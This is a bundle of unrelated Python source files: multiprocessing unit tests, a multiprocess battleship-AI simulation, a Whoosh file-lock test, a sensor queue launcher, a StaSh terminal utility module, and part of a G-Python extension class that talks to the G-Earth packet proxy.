root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
self.Process(target=self._test_level, args=(writer,)).start()
self.assertEqual(LEVEL1, reader.recv())
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
self.Process(target=self._test_level, args=(writer,)).start()
self.assertEqual(LEVEL2, reader.recv())
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
def test_invalid_handles(self):
if WIN32:
return
conn = _multiprocessing.Connection(44977608)
self.assertRaises(IOError, conn.poll)
self.assertRaises(IOError, _multiprocessing.Connection, -1)
#
# Functions used to create test cases from the base ones in this module
#
def get_attributes(Source, names):
d = {}
for name in names:
obj = getattr(Source, name)
if type(obj) == type(get_attributes):
obj = staticmethod(obj)
d[name] = obj
return d
def create_test_cases(Mixin, type):
result = {}
glob = globals()
Type = type[0].upper() + type[1:]
for name in glob.keys():
if name.startswith('_Test'):
base = glob[name]
if type in base.ALLOWED_TYPES:
newname = 'With' + Type + name[1:]
class Temp(base, unittest.TestCase, Mixin):
pass
result[newname] = Temp
Temp.__name__ = newname
Temp.__module__ = Mixin.__module__
return result
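# Illustrative sketch (not part of the original test suite): for a hypothetical base
# class
#
#   class _TestExample(BaseTestCase):
#       ALLOWED_TYPES = ('processes', 'threads')
#
# create_test_cases(ProcessesMixin, type='processes') would generate a concrete
# unittest class registered under the name 'WithProcessesTestExample', mixing in the
# process-backed Queue, Lock, Pipe, etc. from ProcessesMixin.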
#
# Create test cases
#
class ProcessesMixin(object):
TYPE = 'processes'
Process = multiprocessing.Process
locals().update(get_attributes(multiprocessing, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'RawValue',
'RawArray', 'current_process', 'active_children', 'Pipe',
'connection', 'JoinableQueue'
)))
testcases_processes = create_test_cases(ProcessesMixin, type='processes')
globals().update(testcases_processes)
class ManagerMixin(object):
TYPE = 'manager'
Process = multiprocessing.Process
manager = object.__new__(multiprocessing.managers.SyncManager)
locals().update(get_attributes(manager, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'list', 'dict',
'Namespace', 'JoinableQueue'
)))
testcases_manager = create_test_cases(ManagerMixin, type='manager')
globals().update(testcases_manager)
class ThreadsMixin(object):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
locals().update(get_attributes(multiprocessing.dummy, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'current_process',
'active_children', 'Pipe', 'connection', 'dict', 'list',
'Namespace', 'JoinableQueue'
)))
testcases_threads = create_test_cases(ThreadsMixin, type='threads')
globals().update(testcases_threads)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
testcases_other = [OtherTest, TestInvalidHandle]
#
#
#
def test_main(run=None):
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
from test.test_support import TestSkipped
raise TestSkipped("OSError raises on RLock creation, see issue 3111!")
if run is None:
from test.test_support import run_unittest as run
util.get_temp_dir() # creates temp directory for use by all processes
multiprocessing.get_logger().setLevel(LOG_LEVEL)
ProcessesMixin.pool = multiprocessing.Pool(4)
ThreadsMixin.pool = multiprocessing.dummy.Pool(4)
ManagerMixin.manager.__init__()
ManagerMixin.manager.start()
ManagerMixin.pool = ManagerMixin.manager.Pool(4)
testcases = (
sorted(testcases_processes.values(), key=lambda tc:tc.__name__) +
sorted(testcases_threads.values(), key=lambda tc:tc.__name__) +
sorted(testcases_manager.values(), key=lambda tc:tc.__name__) +
testcases_other
)
loadTestsFromTestCase = unittest.defaultTestLoader.loadTestsFromTestCase
suite = unittest.TestSuite(loadTestsFromTestCase(tc) for tc in testcases)
run(suite)
ThreadsMixin.pool.terminate()
ProcessesMixin.pool.terminate()
ManagerMixin.pool.terminate()
ManagerMixin.manager.shutdown()
del ProcessesMixin.pool, ThreadsMixin.pool, ManagerMixin.pool
def main():
test_main(unittest.TextTestRunner(verbosity=2).run)
if __name__ == '__main__':
main()
|
simulation1.py
|
"""
Simulate a large number of games with the hunt/target and random AIs, using multiple processes.
"""
from core import player, hunt_ai, random_ai, field_utils
from multiprocessing import Queue, Process
import sys
def hunt_child(name, q, samples, parameters):
"""
worker process for running target/hunt AI simulations
"""
print("starting:", name)
for i in range(samples):
# create dummy player and dummy cheat_list
dummy = player.Player()
cheat_list = []
# if cheating simulation, create proper cheat_list
if parameters[1]:
cheat_list = field_utils.generate_cheat_list(dummy.get_field(),
parameters[2])
# setup AI
ai = hunt_ai.Hunt_AI(parity=parameters[0], cheat=parameters[1],
cheat_input=cheat_list)
# simulate game and send results to supervisor thread
k = 0
while not dummy.has_lost():
k += 1
ai.turn(dummy)
if i % 1000 == 0:
print(name + ": " + str(i*100/samples) + "%") # progress display
if k <= 100:
q.put([name, k, i])
print(name, " exiting")
sys.exit()
def random_child(name, q, samples):
"""
worker process for running random AI simulations
"""
("starting:", name)
for i in range(samples):
# setup game
dummy = player.Player()
ai = random_ai.Random_AI()
# play game and send results to supervisor thread
k = 0
while not dummy.has_lost():
k += 1
ai.turn(dummy)
if i % 1000 == 0:
print(name + ": " + str(i*100/samples) + "%") # progress display
if k <= 100:
q.put([name, k, i])
print(name, " exiting")
sys.exit()
def supervisor(name, q, samples, threads):
"""
Supervisor process.
Stores results and, once all simulations are done, saves them to .txt files.
"""
print("Starting:", name)
# prepare dict for storing results and status watching list
results_dict = {}
current = []
# while any simulation still running, check queue for results
while not sum(current) == threads:
while not q.empty():
data = q.get()
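# data layout, as produced by the worker processes: [simulation name, number of
# shots needed to finish the game, sample index]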
# if simulation finished, add that information to "current" list
if data[2] == samples-1:
current.append(True)
# sort results by parameters of the simulation
if data[0] in list(results_dict.keys()):
results_dict[data[0]][data[1]] += 1
else:
results_dict[data[0]] = [0 for x in range(101)]
results_dict[data[0]][data[1]] += 1
# save results to individual files, named by parameters of simulation
print(name, " saving to files")
for key in list(results_dict.keys()):
f = open("results/"+str(key)+".txt", "w")
for number in results_dict[key]:
f.write(str(number)+"\n")
f.close()
print(name, " exiting")
sys.exit()
def main():
samples = 1000000 # number of games simulated per thread
q = Queue(maxsize=0)
threads_each = 1 # number of threads for every parameter variant
# parameter variants of target/hunt AI to run
parameters = ((False, False, 0), (False, True, 1), (False, True, 2),
(False, True, 3), (False, True, 4), (False, True, 5),
(True, False, 0), (True, True, 1), (True, True, 2),
(True, True, 3), (True, True, 4), (True, True, 5))
# run every parameter variant on defined amount of threads
for parameter in parameters:
for x in range(threads_each):
# name the thread by parameters, for easy sorting in supervisor thread
name = "h-"+str(parameter[0])+"-"+str(parameter[1])+"-"+str(parameter[2])
thread = Process(target=hunt_child, args=(name, q, samples, parameter))
thread.start()
# also start the random AI threads
for y in range(threads_each):
thread = Process(target=random_child, args=("r", q, samples))
thread.start()
# start the supervisor thread, only need one
thread = Process(target=supervisor, args=("Supervisor", q, samples,
len(parameters)+1*threads_each))
thread.start()
if __name__ == "__main__":
main()
|
test_misc.py
|
import unittest
import os, os.path, threading, time
from whoosh.filedb.filestore import FileStorage
from whoosh.support.filelock import try_for
class TestMisc(unittest.TestCase):
def make_dir(self, name):
if not os.path.exists(name):
os.mkdir(name)
def destroy_dir(self, name):
try:
os.rmdir("testindex")
except:
pass
def clean_file(self, path):
if os.path.exists(path):
try:
os.remove(path)
except:
pass
def test_filelock_simple(self):
self.make_dir("testindex")
st = FileStorage("testindex")
lock1 = st.lock("testlock")
lock2 = st.lock("testlock")
self.assertTrue(lock1.acquire())
self.assertFalse(lock2.acquire())
lock1.release()
self.assertTrue(lock2.acquire())
self.assertFalse(lock1.acquire())
lock2.release()
self.clean_file("testindex/testlock")
self.destroy_dir("testindex")
def test_threaded_filelock(self):
self.make_dir("testindex")
st = FileStorage("testindex")
lock1 = st.lock("testlock")
result = []
# The thread function tries to acquire the lock and
# then quits
def fn():
lock2 = st.lock("testlock")
gotit = try_for(lock2.acquire, 1.0, 0.1)
if gotit:
result.append(True)
lock2.release()
t = threading.Thread(target=fn)
# Acquire the lock in this thread
lock1.acquire()
# Start the other thread trying to acquire the lock
t.start()
# Wait for a bit
time.sleep(0.15)
# Release the lock
lock1.release()
# Wait for the other thread to finish
t.join()
# If the other thread got the lock, it should have
# appended something to the "results" list.
self.assertEqual(len(result), 1)
self.clean_file("testindex/testlock")
self.destroy_dir("testindex")
if __name__ == '__main__':
unittest.main()
|
__main__.py
|
from src.config.config import QUEUE_HUMIDITY_NAME, QUEUE_LIGHT_NAME, QUEUE_TEMPERATURE_NAME
from src.measures.humidity import Humidity
from src.measures.light import Light
from src.measures.temperature import Temperature
from src.queue.queue import Queue
from threading import Thread
controllers = [
Humidity(QUEUE_HUMIDITY_NAME, 60),
Light(QUEUE_LIGHT_NAME, 60),
Temperature(QUEUE_TEMPERATURE_NAME, 60)
]
def main():
print('main')
for controller in controllers:
Thread(target=Queue, args=(controller, )).start()
if __name__ == '__main__':
main()
|
shcommon.py
|
# -*- coding: utf-8 -*-
"""
The Control, Escape and Graphics are taken from pyte (https://github.com/selectel/pyte)
"""
import os
import sys
import platform
import functools
import threading
import ctypes
from itertools import chain
import six
IN_PYTHONISTA = sys.executable.find('Pythonista') >= 0
if IN_PYTHONISTA:
import plistlib
_properties = plistlib.readPlist(os.path.join(os.path.dirname(sys.executable), 'Info.plist'))
PYTHONISTA_VERSION = _properties['CFBundleShortVersionString']
PYTHONISTA_VERSION_LONG = _properties['CFBundleVersion']
if PYTHONISTA_VERSION < '3.0':
python_capi = ctypes.pythonapi
else:
# The default pythonapi always points to Python 3 in Pythonista 3
if six.PY3:
python_capi = ctypes.pythonapi
else:
# We need to load the Python 2 API manually
try:
python_capi = ctypes.PyDLL(
os.path.join(os.path.dirname(sys.executable),
'Frameworks/Py2Kit.framework/Py2Kit'))
except OSError:
python_capi = ctypes.PyDLL(
os.path.join(os.path.dirname(sys.executable),
'Frameworks/PythonistaKit.framework/PythonistaKit'))
else:
PYTHONISTA_VERSION = '0.0'
PYTHONISTA_VERSION_LONG = '000000'
python_capi = ctypes.pythonapi
platform_string = platform.platform()
ON_IPAD = platform_string.find('iPad') >= 0
ON_IOS_8 = platform_string.split('-')[1].startswith('14')
M_64 = platform_string.find('64bit') != -1
CTRL_KEY_FLAG = (1 << 18) # Control key for keyCommands
CMD_KEY_FLAG = (1 << 20) # Command key
_STASH_ROOT = os.path.realpath(os.path.abspath(
os.path.dirname(os.path.dirname(__file__))))
_STASH_CONFIG_FILES = ('.stash_config', 'stash.cfg')
_STASH_HISTORY_FILE = '.stash_history'
# directory for stash extensions
_STASH_EXTENSION_PATH = os.path.abspath(
os.path.join(os.getenv("HOME"), "Library", "stash_extensions"),
)
# directory for stash bin extensions
_STASH_EXTENSION_BIN_PATH = os.path.join(_STASH_EXTENSION_PATH, "bin")
# directory for stash man extensions
_STASH_EXTENSION_MAN_PATH = os.path.join(_STASH_EXTENSION_PATH, "man")
# directory for stash FSI extensions
_STASH_EXTENSION_FSI_PATH = os.path.join(_STASH_EXTENSION_PATH, "fsi")
# directory for stash patch extensions
_STASH_EXTENSION_PATCH_PATH = os.path.join(_STASH_EXTENSION_PATH, "patches")
# list of directories outside of _STASH_ROOT, used for simple mkdir
_EXTERNAL_DIRS = [
_STASH_EXTENSION_PATH,
_STASH_EXTENSION_BIN_PATH,
_STASH_EXTENSION_MAN_PATH,
_STASH_EXTENSION_FSI_PATH,
_STASH_EXTENSION_PATCH_PATH,
]
# Python 3 or not Python 3
PY3 = six.PY3
# Save the true IOs
if IN_PYTHONISTA:
# The stdio catchers recreation is copied from code written by @dgelessus
# https://forum.omz-software.com/topic/1946/pythonista-1-6-beta/167
# In pythonista beta 301006, _outputcapture was replaced with pykit_io
try:
import _outputcapture
except ImportError:
import pykit_io
class _outputcapture(object):
ReadStdin=pykit_io.read_stdin
CaptureStdout=pykit_io.write_stdout
CaptureStderr=pykit_io.write_stderr
if sys.stdin.__class__.__name__ == 'StdinCatcher':
_SYS_STDIN = sys.__stdin__ = sys.stdin
elif sys.__stdin__.__class__.__name__ == 'StdinCatcher':
_SYS_STDIN = sys.__stdin__
else:
class StdinCatcher(object):
def __init__(self):
self.encoding = 'utf8'
def read(self, limit=-1):
return _outputcapture.ReadStdin(limit)
def readline(self):
return _outputcapture.ReadStdin()
_SYS_STDIN = StdinCatcher()
if sys.stdout.__class__.__name__ == 'StdoutCatcher':
_SYS_STDOUT = sys.__stdout__ = sys.stdout
elif sys.__stdout__.__class__.__name__ == 'StdoutCatcher':
_SYS_STDOUT = sys.__stdout__
else:
class StdoutCatcher(object):
def __init__(self):
self.encoding = 'utf8'
def flush(self):
pass
def write(self, s):
if isinstance(s, str):
_outputcapture.CaptureStdout(s)
elif isinstance(s, six.text_type):
_outputcapture.CaptureStdout(s.encode('utf8'))
def writelines(self, lines):
self.write(''.join(lines))
_SYS_STDOUT = StdoutCatcher()
if sys.stderr.__class__.__name__ == 'StderrCatcher':
_SYS_STDERR = sys.__stderr__ = sys.stderr
elif sys.__stderr__.__class__.__name__ == 'StderrCatcher':
_SYS_STDERR = sys.__stderr__
else:
class StderrCatcher(object):
def __init__(self):
self.encoding = 'utf8'
def flush(self):
pass
def write(self, s):
if isinstance(s, str):
_outputcapture.CaptureStderr(s)
elif isinstance(s, six.text_type):
_outputcapture.CaptureStderr(s.encode('utf8'))
def writelines(self, lines):
self.write(''.join(lines))
_SYS_STDERR = StderrCatcher()
else:
_SYS_STDOUT = sys.stdout
_SYS_STDERR = sys.stderr
_SYS_STDIN = sys.stdin
_SYS_PATH = sys.path
_OS_ENVIRON = os.environ
def is_binary_file(filename, nbytes=1024):
"""
An approximate way to tell whether a file is binary.
:param str filename: The name of the file to be tested.
:param int nbytes: number of bytes to read for test
:return: True if the file appears to be binary, False otherwise.
"""
with open(filename, 'rb') as ins:
for c in ins.read(nbytes):
if isinstance(c, six.integer_types):
oc = c
else:
oc = ord(c)
if 127 < oc < 256 or (oc < 32 and oc not in (9, 10, 13)):
return True
else:
return False
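# Usage sketch (the file names below are hypothetical):
#   is_binary_file('/usr/bin/env')  # likely True for a compiled executable
#   is_binary_file('notes.txt')     # False for plain ASCII text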
def sh_delay(func, nseconds):
t = threading.Timer(nseconds, func)
t.start()
return t
def sh_background(name=None):
def wrap(func):
@functools.wraps(func)
def wrapped_func(*args, **kwargs):
t = threading.Thread(name=name, target=func, args=args, kwargs=kwargs)
t.start()
return t
return wrapped_func
return wrap
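# Usage sketch for the two helpers above (names are illustrative only):
#   sh_delay(save_state, 5)         # run save_state() after ~5 seconds, returns the Timer
#   @sh_background('downloader')
#   def fetch(url):                 # the decorated call returns the started Thread
#       ...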
class ShFileNotFound(Exception):
pass
class ShIsDirectory(Exception):
pass
class ShNotExecutable(Exception):
def __init__(self, filename):
super(Exception, self).__init__('{}: not executable\n'.format(filename))
class ShSingleExpansionRequired(Exception):
pass
class ShEventNotFound(Exception):
pass
class ShBadSubstitution(Exception):
pass
class ShSyntaxError(Exception):
pass
class ShInternalError(Exception):
pass
class Control(object):
"""
pyte.control
~~~~~~~~~~~~
This module defines simple control sequences, recognized by
:class:`~pyte.streams.Stream`, the set of codes here is for
``TERM=linux`` which is a superset of VT102.
:copyright: (c) 2011-2013 by Selectel, see AUTHORS for details.
:license: LGPL, see LICENSE for more details.
"""
#: *Space*: Not surprisingly -- ``" "``.
SP = u" "
#: *Null*: Does nothing.
NUL = u"\u0000"
#: *Bell*: Beeps.
BEL = u"\u0007"
#: *Backspace*: Backspace one column, but not past the beginning of the
#: line.
BS = u"\u0008"
#: *Horizontal tab*: Move cursor to the next tab stop, or to the end
#: of the line if there is no earlier tab stop.
HT = u"\u0009"
#: *Linefeed*: Give a line feed, and, if :data:`pyte.modes.LNM` (new
#: line mode) is set also a carriage return.
LF = u"\n"
#: *Vertical tab*: Same as :data:`LF`.
VT = u"\u000b"
#: *Form feed*: Same as :data:`LF`.
FF = u"\u000c"
#: *Carriage return*: Move cursor to left margin on current line.
CR = u"\r"
#: *Shift out*: Activate G1 character set.
SO = u"\u000e"
#: *Shift in*: Activate G0 character set.
SI = u"\u000f"
#: *Cancel*: Interrupt escape sequence. If received during an escape or
#: control sequence, cancels the sequence and displays substitution
#: character.
CAN = u"\u0018"
#: *Substitute*: Same as :data:`CAN`.
SUB = u"\u001a"
#: *Escape*: Starts an escape sequence.
ESC = u"\u001b"
#: *Delete*: Is ignored.
DEL = u"\u007f"
#: *Control sequence introducer*: An equivalent for ``ESC [``.
CSI = u"\u009b"
class Escape(object):
"""
pyte.escape
~~~~~~~~~~~
This module defines both CSI and non-CSI escape sequences, recognized
by :class:`~pyte.streams.Stream` and subclasses.
:copyright: (c) 2011-2013 by Selectel, see AUTHORS for details.
:license: LGPL, see LICENSE for more details.
"""
#: *Reset*.
RIS = u"c"
#: *Index*: Move cursor down one line in same column. If the cursor is
#: at the bottom margin, the screen performs a scroll-up.
IND = u"D"
#: *Next line*: Same as :data:`pyte.control.LF`.
NEL = u"E"
#: Tabulation set: Set a horizontal tab stop at cursor position.
HTS = u"H"
#: *Reverse index*: Move cursor up one line in same column. If the
#: cursor is at the top margin, the screen performs a scroll-down.
RI = u"M"
#: Save cursor: Save cursor position, character attribute (graphic
#: rendition), character set, and origin mode selection (see
#: :data:`DECRC`).
DECSC = u"7"
#: *Restore cursor*: Restore previously saved cursor position, character
#: attribute (graphic rendition), character set, and origin mode
#: selection. If none were saved, move cursor to home position.
DECRC = u"8"
# "Percent" escape sequences.
# ---------------------------
#: *Select default (ISO 646 / ISO 8859-1)*.
DEFAULT = u"@"
#: *Select UTF-8*.
UTF8 = u"G"
#: *Select UTF-8 (obsolete)*.
UTF8_OBSOLETE = u"8"
# "Sharp" escape sequences.
# -------------------------
#: *Alignment display*: Fill screen with uppercase E's for testing
#: screen focus and alignment.
DECALN = u"8"
# ECMA-48 CSI sequences.
# ---------------------
#: *Insert character*: Insert the indicated # of blank characters.
ICH = u"@"
#: *Cursor up*: Move cursor up the indicated # of lines in same column.
#: Cursor stops at top margin.
CUU = u"A"
#: *Cursor down*: Move cursor down the indicated # of lines in same
#: column. Cursor stops at bottom margin.
CUD = u"B"
#: *Cursor forward*: Move cursor right the indicated # of columns.
#: Cursor stops at right margin.
CUF = u"C"
#: *Cursor back*: Move cursor left the indicated # of columns. Cursor
#: stops at left margin.
CUB = u"D"
#: *Cursor next line*: Move cursor down the indicated # of lines to
#: column 1.
CNL = u"E"
#: *Cursor previous line*: Move cursor up the indicated # of lines to
#: column 1.
CPL = u"F"
#: *Cursor horizontal align*: Move cursor to the indicated column in
#: current line.
CHA = u"G"
#: *Cursor position*: Move cursor to the indicated line, column (origin
#: at ``1, 1``).
CUP = u"H"
#: *Erase data* (default: from cursor to end of line).
ED = u"J"
#: *Erase in line* (default: from cursor to end of line).
EL = u"K"
#: *Insert line*: Insert the indicated # of blank lines, starting from
#: the current line. Lines displayed below cursor move down. Lines moved
#: past the bottom margin are lost.
IL = u"L"
#: *Delete line*: Delete the indicated # of lines, starting from the
#: current line. As lines are deleted, lines displayed below cursor
#: move up. Lines added to bottom of screen have spaces with same
#: character attributes as last line move up.
DL = u"M"
#: *Delete character*: Delete the indicated # of characters on the
#: current line. When character is deleted, all characters to the right
#: of cursor move left.
DCH = u"P"
#: *Erase character*: Erase the indicated # of characters on the
#: current line.
ECH = u"X"
#: *Horizontal position relative*: Same as :data:`CUF`.
HPR = u"a"
#: *Vertical position adjust*: Move cursor to the indicated line,
#: current column.
VPA = u"d"
#: *Vertical position relative*: Same as :data:`CUD`.
VPR = u"e"
#: *Horizontal / Vertical position*: Same as :data:`CUP`.
HVP = u"f"
#: *Tabulation clear*: Clears a horizontal tab stop at cursor position.
TBC = u"g"
#: *Set mode*.
SM = u"h"
#: *Reset mode*.
RM = u"l"
#: *Select graphics rendition*: The terminal can display the following
#: character attributes that change the character display without
#: changing the character (see :mod:`pyte.graphics`).
SGR = u"m"
#: *Select top and bottom margins*: Selects margins, defining the
#: scrolling region; parameters are top and bottom line. If called
#: without any arguments, whole screen is used.
DECSTBM = u"r"
#: *Horizontal position adjust*: Same as :data:`CHA`.
HPA = u"'"
class Graphics(object):
# -*- coding: utf-8 -*-
"""
pyte.graphics
~~~~~~~~~~~~~
This module defines graphic-related constants, mostly taken from
:manpage:`console_codes(4)` and
http://pueblo.sourceforge.net/doc/manual/ansi_color_codes.html.
:copyright: (c) 2011-2013 by Selectel, see AUTHORS for details.
:license: LGPL, see LICENSE for more details.
"""
#: A mapping of ANSI text style codes to style names, "+" means the
#: attribute is set, "-" -- reset; example:
#:
#: >>> text[1]
#: '+bold'
#: >>> text[9]
#: '+strikethrough'
TEXT = {
1: "+bold",
3: "+italics",
4: "+underscore",
7: "+reverse",
9: "+strikethrough",
22: "-bold",
23: "-italics",
24: "-underscore",
27: "-reverse",
29: "-strikethrough"
}
#: A mapping of ANSI foreground color codes to color names, example:
#:
#: >>> FG[30]
#: 'black'
#: >>> FG[38]
#: 'default'
FG = {
30: "black",
31: "red",
32: "green",
33: "brown",
34: "blue",
35: "magenta",
36: "cyan",
37: "white",
39: "default", # white.
50: "gray",
51: "yellow",
52: "smoke",
}
#: A mapping of ANSI background color codes to color names, example:
#:
#: >>> BG[40]
#: 'black'
#: >>> BG[48]
#: 'default'
BG = {
40: "black",
41: "red",
42: "green",
43: "brown",
44: "blue",
45: "magenta",
46: "cyan",
47: "white",
49: "default", # black.
60: "gray",
61: "yellow",
62: "smoke",
}
# Reverse mapping of all available attributes -- keep this private!
_SGR = {v: k for k, v in chain(FG.items(),
TEXT.items())}
_SGR.update({'bg-' + v: k for k, v in BG.items()})
|
gextension.py
|
import socket
import sys
import threading
from enum import Enum
from .hpacket import HPacket
from .hmessage import HMessage, Direction
import json
MINIMUM_GEARTH_VERSION = "1.4.1"
class INCOMING_MESSAGES(Enum):
ON_DOUBLE_CLICK = 1
INFO_REQUEST = 2
PACKET_INTERCEPT = 3
FLAGS_CHECK = 4
CONNECTION_START = 5
CONNECTION_END = 6
PACKET_TO_STRING_RESPONSE = 20
STRING_TO_PACKET_RESPONSE = 21
INIT = 7
class OUTGOING_MESSAGES(Enum):
EXTENSION_INFO = 1
MANIPULATED_PACKET = 2
REQUEST_FLAGS = 3
SEND_MESSAGE = 4
PACKET_TO_STRING_REQUEST = 20
STRING_TO_PACKET_REQUEST = 21
EXTENSION_CONSOLE_LOG = 98
EXTENSION_SETTINGS_DEFAULT = {"use_click_trigger": False, "can_leave": True, "can_delete": True}
EXTENSION_INFO_REQUIRED_FIELDS = ["title", "description", "version", "author"]
PORT_FLAG = ["--port", "-p"]
FILE_FLAG = ["--filename", "-f"]
COOKIE_FLAG = ["--auth-token", "-c"]
def fill_settings(settings, defaults):
if settings is None:
return defaults.copy()
settings = settings.copy()
for key, value in defaults.items():
if key not in settings or settings[key] is None:
settings[key] = value
return settings
def get_argument(args, flags):
if type(flags) == str:
flags = [flags]
for potential_flag in flags:
if potential_flag in args:
index = args.index(potential_flag)
if 0 <= index < len(args) - 1:
return args[index + 1]
return None
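# Example (hypothetical argument list): get_argument(['-p', '9092'], PORT_FLAG)
# returns '9092'; get_argument(['-x'], PORT_FLAG) returns None.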
class Extension:
def __init__(self, extension_info, args, extension_settings=None, silent=False):
if not silent:
print("WARNING: This version of G-Python requires G-Earth >= {}".format(MINIMUM_GEARTH_VERSION), file=sys.stderr)
extension_settings = fill_settings(extension_settings, EXTENSION_SETTINGS_DEFAULT)
if get_argument(args, PORT_FLAG) is None:
raise Exception('Port was not specified (argument example: -p 9092)')
for key in EXTENSION_INFO_REQUIRED_FIELDS:
if key not in extension_info:
raise Exception('Extension info error: {} field missing'.format(key))
port = int(get_argument(args, PORT_FLAG))
file = get_argument(args, FILE_FLAG)
cookie = get_argument(args, COOKIE_FLAG)
self.__sock = None
self.__lost_packets = 0
self._extension_info = extension_info
self.__port = port
self.__file = file
self.__cookie = cookie
self._extension_settings = extension_settings
self.connection_info = None
self.packet_infos = None
self.__start_barrier = threading.Barrier(2)
self.__start_lock = threading.Lock()
self.__stream_lock = threading.Lock()
self.__events = {}
self.__intercept_listeners = {Direction.TO_CLIENT: {-1: []}, Direction.TO_SERVER: {-1: []}}
self.__request_lock = threading.Lock()
self.__response_barrier = threading.Barrier(2)
self.__response = None
self.__manipulation_lock = threading.Lock()
self.__manipulation_event = threading.Event()
self.__manipulate_messages = []
def __read_gearth_packet(self):
write_pos = 0
length_buffer = bytearray(4)
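# G-Earth frames every packet with a 4-byte big-endian length prefix; read the
# prefix first, then the payload it announces.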
while write_pos < 4:
n_read = self.__sock.recv_into(memoryview(length_buffer)[write_pos:])
if n_read == 0:
raise EOFError
write_pos += n_read
packet_length = int.from_bytes(length_buffer, byteorder='big')
packet_buffer = length_buffer + bytearray(packet_length)
while write_pos < 4 + packet_length:
n_read = self.__sock.recv_into(memoryview(packet_buffer)[write_pos:])
if n_read == 0:
raise EOFError
write_pos += n_read
return HPacket.from_bytes(packet_buffer)
def __packet_manipulation_thread(self):
while not self.is_closed():
habbo_message = None
while habbo_message is None and not self.is_closed():
if len(self.__manipulate_messages) > 0:
self.__manipulation_lock.acquire()
habbo_message = self.__manipulate_messages.pop(0)
self.__manipulation_lock.release()
self.__manipulation_event.clear()
else:
self.__manipulation_event.wait(0.002)
self.__manipulation_event.clear()
if self.is_closed():
return
habbo_packet = habbo_message.packet
habbo_packet.default_extension = self
for func in self.__intercept_listeners[habbo_message.direction][-1]:
func(habbo_message)
habbo_packet.reset()
header_id = habbo_packet.header_id()
potential_intercept_ids = {header_id}
if self.packet_infos is not None and header_id in self.packet_infos[habbo_message.direction]:
for elem in self.packet_infos[habbo_message.direction][header_id]:
if elem['Name'] is not None:
potential_intercept_ids.add(elem['Name'])
if elem['Hash'] is not None:
potential_intercept_ids.add(elem['Hash'])
for id in potential_intercept_ids:
if id in self.__intercept_listeners[habbo_message.direction]:
for func in self.__intercept_listeners[habbo_message.direction][id]:
func(habbo_message)
habbo_packet.reset()
response_packet = HPacket(OUTGOING_MESSAGES.MANIPULATED_PACKET.value)
response_packet.append_string(repr(habbo_message), head=4, encoding='iso-8859-1')
self.__send_to_stream(response_packet)
def __connection_thread(self):
t = threading.Thread(target=self.__packet_manipulation_thread)
t.start()
while not self.is_closed():
try:
packet = self.__read_gearth_packet()
except:
if not self.is_closed():
self.stop()
return
message_type = INCOMING_MESSAGES(packet.header_id())
if message_type == INCOMING_MESSAGES.INFO_REQUEST:
response = HPacket(OUTGOING_MESSAGES.EXTENSION_INFO.value)
response \
.append_string(self._extension_info['title']) \
.append_string(self._extension_info['author']) \
.append_string(self._extension_info['version']) \
.append_string(self._extension_info['description']) \
.append_bool(self._extension_settings['use_click_trigger']) \
.append_bool(self.__file is not None) \
.append_string('' if self.__file is None else self.__file) \
.append_string('' if self.__cookie is None else self.__cookie) \
.append_bool(self._extension_settings['can_leave']) \
.append_bool(self._extension_settings['can_delete'])
self.__send_to_stream(response)
elif message_type == INCOMING_MESSAGES.CONNECTION_START:
host, port, hotel_version, client_identifier, client_type = packet.read("sisss")
self.__parse_packet_infos(packet)
self.connection_info = {'host': host, 'port': port, 'hotel_version': hotel_version,
'client_identifier': client_identifier, 'client_type': client_type}
self.__raise_event('connection_start')
if self.__await_connect_packet:
self.__await_connect_packet = False
self.__start_barrier.wait()
elif message_type == INCOMING_MESSAGES.CONNECTION_END:
self.__raise_event('connection_end')
self.connection_info = None
self.packet_infos = None
elif message_type == INCOMING_MESSAGES.FLAGS_CHECK:
size = packet.read_int()
flags = [packet.read_string() for _ in range(size)]
self.__response = flags
self.__response_barrier.wait()
elif message_type == INCOMING_MESSAGES.INIT:
self.__raise_event('init')
self.write_to_console(
'g_python extension "{}" successfully initialized'.format(self._extension_info['title']),
'green',
False
)
self.__await_connect_packet = packet.read_bool()
if not self.__await_connect_packet:
self.__start_barrier.wait()
elif message_type == INCOMING_MESSAGES.ON_DOUBLE_CLICK:
self.__raise_event('double_click')
elif message_type == INCOMING_MESSAGES.PACKET_INTERCEPT:
habbo_msg_as_string = packet.read_string(head=4, encoding='iso-8859-1')
habbo_message = HMessage.reconstruct_from_java(habbo_msg_as_string)
self.__manipulation_lock.acquire()
self.__manipulate_messages.append(habbo_message)
self.__manipulation_lock.release()
self.__manipulation_event.set()
elif message_type == INCOMING_MESSAGES.PACKET_TO_STRING_RESPONSE:
string = packet.read_string(head=4, encoding='iso-8859-1')
expression = packet.read_string(head=4, encoding='utf-8')
self.__response = (string, expression)
self.__response_barrier.wait()
elif message_type == INCOMING_MESSAGES.STRING_TO_PACKET_RESPONSE:
packet_string = packet.read_string(head=4, encoding='iso-8859-1')
self.__response = HPacket.reconstruct_from_java(packet_string)
self.__response_barrier.wait()
def __parse_packet_infos(self, packet : HPacket):
incoming = {}
outgoing = {}
length = packet.read_int()
for _ in range(length):
headerId, hash, name, structure, isOutgoing, source = packet.read('isssBs')
